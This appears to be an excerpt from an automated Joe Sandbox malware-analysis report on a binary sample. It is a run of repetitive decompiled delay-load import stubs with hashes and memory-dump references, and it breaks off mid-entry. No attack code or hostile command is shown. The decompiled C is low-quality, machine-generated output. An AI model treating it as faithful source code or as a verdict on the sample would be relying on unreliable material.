Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d1ea36b01e26840e02ff9094d54353566309997ef511a454a86d13e14d32a64f
Instruction ID: cf0b904f0e0c60a1320d21f23162a147b2c84447feca9a0b3d7c8028642c96a1
Opcode Fuzzy Hash: d1ea36b01e26840e02ff9094d54353566309997ef511a454a86d13e14d32a64f
Instruction Fuzzy Hash: 12B012D5259101AE328866145C02E7A42CCC4D0B11334D0FBF905C02A0F4CC0C044133

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD702 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD702() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc01160); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b2a8eba687f64c0382535b73546a82c2835445ea0989e68e36622982825cc5e7
Instruction ID: 05580bc871a3a498c23904236b81c9aba1ee8ae00f6c67d73162f18d2e353944
Opcode Fuzzy Hash: b2a8eba687f64c0382535b73546a82c2835445ea0989e68e36622982825cc5e7
Instruction Fuzzy Hash: EEB012D52591016E318862145C42D7B42CCC4D4B5133480FBB505C01A0F4CC0C004233

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD77A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD77A() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc01130); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 551b28e6cd6fba9e49e5101a8db5bba997823c886ba073ffc20db6e0f8ac3c8a
Instruction ID: a1bc1217153355b74493c2a6bc92e761c08695dbf02fb50fa32abd5d289072ef
Opcode Fuzzy Hash: 551b28e6cd6fba9e49e5101a8db5bba997823c886ba073ffc20db6e0f8ac3c8a
Instruction Fuzzy Hash: C3B012D126E0016E318862145C02D7A42CDC8D4B5133480FBB505C01A0F4CC0C004133

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD766 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD766() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc01138); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cf602885759c0140e86ae72aec7cf54562ca051c351732a945822ceeb85be13f
Instruction ID: 284c4dd9595f745b08fc1594b9b5e913883374399486892bd814ab1c8c557a1e
Opcode Fuzzy Hash: cf602885759c0140e86ae72aec7cf54562ca051c351732a945822ceeb85be13f
Instruction Fuzzy Hash: C4B012E125E1016E32C863145C02D7A42CDC4D0B1133482FBB505C01A0F4CC0C404133

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD752 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD752() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc01140); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dad76a7bd2ef296aa717b5326a8e35ae9e188c445f18c27c7a6cb640765ef078
Instruction ID: 39d37ddf5f41cd351e019a9bdd358514c12238a8952bd23e35fea8e42c790c6a
Opcode Fuzzy Hash: dad76a7bd2ef296aa717b5326a8e35ae9e188c445f18c27c7a6cb640765ef078
Instruction Fuzzy Hash: ACB012E12590016F318862165C02DBA42CCC4D4F5133480FBB606C01A0F4CC0C004133

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD748 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD748() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc01144); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ac42d7d2fa687b3f77632f7cf0a3fb82c19704dbe8c2de76238bf67578a24e1a
Instruction ID: 5faf95f482b79590662f945cc0e72392602bd9d8de3752326e50474436998244
Opcode Fuzzy Hash: ac42d7d2fa687b3f77632f7cf0a3fb82c19704dbe8c2de76238bf67578a24e1a
Instruction Fuzzy Hash: BDB012E12590016F318862155D02EBA42CCC4D0F1133480FBB506C05A0F4CC0D014133

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD8FB Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD8FB() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdadc4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd903
0x00bbd908
0x00bbd90f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD908

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5aa40e6148599362ea9b6b13e5b4618ba013fde95d87e06d0b929109fb4878c8
Instruction ID: b59ebba54731635bfc81f171d1002463a83582c22987b89bec7d61afb1e206b9
Opcode Fuzzy Hash: 5aa40e6148599362ea9b6b13e5b4618ba013fde95d87e06d0b929109fb4878c8
Instruction Fuzzy Hash: 40A011EA2AA0023E32083220AC0AEBA028CC0C0B2233088FAB080800E0B8C828000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD93E Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD93E() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdadc4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd903
0x00bbd908
0x00bbd90f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD908

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 37457e70303801fa62930b8d36eda26a352df5ab22afbcccaf76a5cc55dfe224
Instruction ID: fdae2e1bf90ca0c666fc4115b698aef1534865bef248bed9e22f68ea64754601
Opcode Fuzzy Hash: 37457e70303801fa62930b8d36eda26a352df5ab22afbcccaf76a5cc55dfe224
Instruction Fuzzy Hash: 8CA011CA2AA002BE32083220AC0ACBA028CC0C8B2233088FAB082800E0B8C808000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD920 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD920() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdadc4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd903
0x00bbd908
0x00bbd90f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD908

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0ec3e95be4e47e8bbc9c93231cbecf538bff5af3ccbf64d259ff4a52817fac90
Instruction ID: fdae2e1bf90ca0c666fc4115b698aef1534865bef248bed9e22f68ea64754601
Opcode Fuzzy Hash: 0ec3e95be4e47e8bbc9c93231cbecf538bff5af3ccbf64d259ff4a52817fac90
Instruction Fuzzy Hash: 8CA011CA2AA002BE32083220AC0ACBA028CC0C8B2233088FAB082800E0B8C808000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD916 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD916() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdadc4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd903
0x00bbd908
0x00bbd90f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD908

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 814b436b7e86adc2b208d5fc314c7777c09807dc9ad50883ec06fefa1d6cb9ef
Instruction ID: fdae2e1bf90ca0c666fc4115b698aef1534865bef248bed9e22f68ea64754601
Opcode Fuzzy Hash: 814b436b7e86adc2b208d5fc314c7777c09807dc9ad50883ec06fefa1d6cb9ef
Instruction Fuzzy Hash: 8CA011CA2AA002BE32083220AC0ACBA028CC0C8B2233088FAB082800E0B8C808000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD952 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD952() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdadc4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd903
0x00bbd908
0x00bbd90f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD908

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6cd78a3f289b90d6d50fa37b53686ddb481b6a260334545755d7f929d0a7d45f
Instruction ID: fdae2e1bf90ca0c666fc4115b698aef1534865bef248bed9e22f68ea64754601
Opcode Fuzzy Hash: 6cd78a3f289b90d6d50fa37b53686ddb481b6a260334545755d7f929d0a7d45f
Instruction Fuzzy Hash: 8CA011CA2AA002BE32083220AC0ACBA028CC0C8B2233088FAB082800E0B8C808000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD948 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD948() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdadc4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd903
0x00bbd908
0x00bbd90f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD908

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 59008fec05364f0276430b13549c289b86df1b95349b2f1f426f0e33ff5ae723
Instruction ID: fdae2e1bf90ca0c666fc4115b698aef1534865bef248bed9e22f68ea64754601
Opcode Fuzzy Hash: 59008fec05364f0276430b13549c289b86df1b95349b2f1f426f0e33ff5ae723
Instruction Fuzzy Hash: 8CA011CA2AA002BE32083220AC0ACBA028CC0C8B2233088FAB082800E0B8C808000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDAA4 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBDAA4() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdae44); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbda87
0x00bbda8c
0x00bbda93

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA8C

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 35fa5d829cb99bd3da2a5a8aa91b88a80c9e3b3460c9ef765765ccf273e178ef
Instruction ID: 3818b191068effdec2c89b1c130b1fe9fc432ae5544854ed1713b0beac058372
Opcode Fuzzy Hash: 35fa5d829cb99bd3da2a5a8aa91b88a80c9e3b3460c9ef765765ccf273e178ef
Instruction Fuzzy Hash: A2A001963AE113BF314862616D4BDBA429DC4D4B613349AEABA42841A1B9D95C459032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDA61 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBDA61() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdae24); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbda26
0x00bbda2b
0x00bbda32

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA2B

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
